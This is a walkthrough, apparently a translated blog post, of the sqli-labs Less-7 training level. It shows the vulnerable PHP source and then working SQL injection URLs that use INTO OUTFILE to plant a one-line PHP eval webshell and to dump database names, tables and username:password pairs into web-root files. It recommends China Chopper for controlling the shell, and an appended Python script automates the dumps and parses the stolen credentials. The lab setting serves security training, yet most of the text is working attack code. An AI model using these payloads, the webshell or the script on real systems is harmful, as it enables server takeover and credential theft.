Sqli-labs Less-7: injection by writing files (dump into outfile)

The level's hint is "dump into outfile", meaning this level is meant to be exploited by writing files with SELECT ... INTO OUTFILE rather than by reading data back through the page. In Background-3 we learned how dump into file works.

First, look at the source code. Focus on how the id parameter is handled and on the SQL statement; from the source you can see:

// Less-7 (sqli-labs): id is taken straight from the query string, unescaped,
// and wrapped in (('...')), so a value ending in ')) closes the quotes and both
// parentheses and lets the attacker append further SQL.
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

// The page never echoes data from the row; it only reports whether a row came
// back. SELECT ... INTO OUTFILE writes the rows to a file instead of returning
// them, so even a successful write ends up in the else branch.
if($row)
{
    echo '<font color= "#FFFF00">';
    echo 'You are in.... Use outfile......';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font color= "#FFFF00">';
    echo 'You have an error in your SQL syntax';
    //print_r(mysql_error());   // the real MySQL error stays hidden from the user
    echo "</font>";
}

Here the id parameter is wrapped in (('...')), so a payload has to start by closing that context with ')) and end by commenting out the trailing LIMIT 0,1 (with --+ or %23).

Now we demonstrate the file-writing approach described above:

First, find the absolute path of the web root directory.

http://127.0.0.1/sql/Less-2/?id=-1%20union%20select%201,@@basedir,@@datadir%20--+

Here we take a shortcut: Less-2 is a simpler level with a plain numeric injection, so we use it to read @@basedir and @@datadir directly and infer the web root from the WAMP layout, which makes the export easy.

http://127.0.0.1/sql/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\uuu.txt" %23

The page still prints the "error" message, because SELECT ... INTO OUTFILE writes the rows to the file and returns no result set for the page to display. That does not matter: uuu.txt has been created in the Less-7 directory. (The write needs the MySQL FILE privilege and a permissive secure_file_priv; if secure_file_priv names a directory, only paths under it can be written, and if it is NULL, INTO OUTFILE is disabled entirely.)

As in Background-3, we can write a one-line webshell (a "one-word Trojan") directly:

http://127.0.0.1/sql/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["mima"])?>' into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\test.php" --+ 

We can see that the one-line webshell has been written to test.php.

Accessing test.php in the browser shows a blank page, since eval() receives nothing without a POST body.

Now connect to the webshell with China Chopper (中国菜刀) or a similar webshell management tool. It provides file management, database management, and so on; in the file manager, for example, you can browse and manage every directory and file on the server.

The rest is not repeated here.

Another approach: write the query results directly to a file under the web root, then fetch that file in the browser.

Note that the target file must not already exist: INTO OUTFILE refuses to overwrite and fails with a "File ... already exists" error, so use a fresh filename for each query.

Write the current user, database name, and MySQL version:

http://127.0.0.1/sql/Less-7/?id=-1')) union select user(),database(),version() into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\1.txt" --+ 

Write the table names of the current database:

http://127.0.0.1/sql/Less-7/?id=-1')) union  select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\2.txt" --+ 

Write the column names of a table, taking users as the example:

http://127.0.0.1/sql/Less-7/?id=-1'))  union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\3.txt" --+ 

Write the contents of the users table (username:password pairs):

http://127.0.0.1/sql/Less-7/?id=-1'))  union select 1,2,group_concat(username,0x3a,password) from users into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\4.txt" --+ 
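As an added example (not code from the original post or from sqli-labs), the following Python script automates the dump-to-file procedure above and uses the same INTO OUTFILE construction as the uuu.txt and test.php writes: it builds the -1')) payloads for the Less-7 (('...')) context, percent-encodes them, fires each one, then fetches the created file through the web server and parses INTO OUTFILE's default tab-separated output. BASE_URL and WEB_DIR are assumed values (the Less-7 URL and the absolute path of the same directory on the server, inferred from @@basedir/@@datadir as shown earlier); STEPS lists the four queries from the post.

```python
# Added example, not code from the original post or from sqli-labs.
# BASE_URL and WEB_DIR are assumptions: the Less-7 URL and the absolute path of
# the same directory on the server (derive it from @@basedir/@@datadir).
from urllib.parse import quote
from urllib.request import urlopen

TEMPLATE = "SELECT * FROM users WHERE id=(('{id}')) LIMIT 0,1"   # from the Less-7 source
BASE_URL = "http://127.0.0.1/sql/Less-7/"                        # assumed
WEB_DIR = "D:\\software\\wamp\\www\\sql\\Less-7\\"               # assumed (WAMP layout)


def outfile_payload(columns, filename, from_clause=""):
    """Build the id value: ')) closes the (('...')) wrapper, a UNION SELECT
    supplies the rows, INTO OUTFILE writes them, and '-- ' comments out the
    trailing LIMIT. Backslashes are doubled because the path is a MySQL string."""
    target = (WEB_DIR + filename).replace("\\", "\\\\")
    select = "union select " + ",".join(columns)
    if from_clause:
        select += " " + from_clause
    return f"-1')) {select} into outfile \"{target}\" -- "


def render_sql(id_value):
    """The statement the vulnerable PHP actually hands to MySQL."""
    return TEMPLATE.format(id=id_value)


def injection_url(payload):
    """Percent-encode everything, including the space after '--' (the post uses '+')."""
    return BASE_URL + "?id=" + quote(payload, safe="")


def parse_outfile(text):
    """INTO OUTFILE's default format: columns separated by tabs, one row per line."""
    return [line.split("\t") for line in text.splitlines() if line]


def parse_credentials(text):
    """Split group_concat(username,0x3a,password) (last column) into (user, password)."""
    rows = parse_outfile(text)
    if not rows:
        return []
    last_column = rows[0][-1]
    return [tuple(item.split(":", 1)) for item in last_column.split(",") if item]


# The four dumps from the post: output file, selected columns, FROM/WHERE clause.
STEPS = [
    ("1.txt", ["user()", "database()", "version()"], ""),
    ("2.txt", ["1", "2", "group_concat(table_name)"],
     "from information_schema.tables where table_schema=database()"),
    ("3.txt", ["1", "2", "group_concat(column_name)"],
     "from information_schema.columns where table_schema='security' and table_name='users'"),
    ("4.txt", ["1", "2", "group_concat(username,0x3a,password)"], "from users"),
]


def http_get(url):
    with urlopen(url) as resp:
        return resp.read().decode("utf-8", "replace")


def dump_all(fetch=http_get):
    """Fire each injection, then read the file it created through the web server.
    The page itself shows the 'error' text (INTO OUTFILE returns no result set);
    the file content is what matters. INTO OUTFILE will not overwrite an existing
    file, so use fresh filenames when re-running."""
    results = {}
    for filename, columns, from_clause in STEPS:
        fetch(injection_url(outfile_payload(columns, filename, from_clause)))
        results[filename] = fetch(BASE_URL + filename)
    return results


if __name__ == "__main__":
    files = dump_all()
    for name, body in files.items():
        print(name, parse_outfile(body))
    print(parse_credentials(files["4.txt"]))
```

The fetch function is injectable so the payload building and parsing can be checked without a live target; against a real sqli-labs instance, print(render_sql(payload)) shows exactly what MySQL executes, which is the quickest way to confirm the ')) closure and comment are right before sending anything.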

From: https://www.cnblogs.com/lcamry/p/5763105.html

Source: www.cnblogs.com/zhengna/p/12575948.html